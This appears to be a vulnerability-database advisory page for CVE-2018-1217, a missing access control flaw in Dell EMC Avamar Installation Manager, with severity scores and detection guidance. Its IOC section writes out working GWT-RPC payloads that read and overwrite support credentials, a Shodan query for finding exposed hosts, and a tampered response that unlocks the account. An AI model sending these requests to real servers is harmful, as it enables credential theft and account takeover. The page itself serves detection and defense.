cbcvebase.
CVE-2018-1217
published 2018-04-09

CVE-2018-1217: Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a…

PriorityP188critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
46.64%
98.7th percentile
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.

Affected

5 ranges
VendorProductVersion rangeFixed in
dellemc_avamar
dellemc_avamar
dellemc_avamar
dellemc_integrated_data_protection_appliance
dellemc_integrated_data_protection_appliance

Detection & IOCsextracted from sources · hover to see the quote

url/avi/avigui/avigwt
path/avi/avigui/avigwt
other60AF6BC6976F9B1F05AC454813F5324D
command7|0|6|https://{{Hostname}}/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|{{Hostname}}|1|2|3|4|2|5|5|6|0|
command7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611||{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|
command7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611||1|2|3|4|3|5|5|5|6|0|7|
othertext/x-gwt-rpc; charset=utf-8
otherJetty(9.0.6.v20130930)
sigma
contains_all(body, "//OK", "emcsupportUsername", "emcsupportPassword") AND status_code == 200
  • Alert on HTTP 200 responses from /avi/avigui/avigwt that contain both '//OK' and 'emcsupportUsername' and 'emcsupportPassword' in the body — this indicates successful credential exfiltration.
  • The GWT serialization token '60AF6BC6976F9B1F05AC454813F5324D' appears in all exploit payloads targeting this vulnerability and can be used as a network signature.
  • Monitor for the GWT RPC service name 'com.avamar.avinstaller.gwt.shared.AvinstallerService' in HTTP POST body to /avi/avigui/avigwt from unauthenticated sessions (no valid session cookie).
  • Shodan query 'title:"AVAMAR"' can be used to identify internet-exposed Avamar Installation Manager instances potentially vulnerable to this CVE.
  • Tampered/injected GWT response body '//OK[1,["true"],0,7]' for the supportLogin method can be used to detect response-tampering attacks (e.g., via proxy) that unlock the support account.
  • ·The vulnerability requires no authentication; any network-level control blocking unauthenticated access to /avi/avigui/avigwt will mitigate exploitation. Credentials are returned in plaintext in the HTTP response body.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.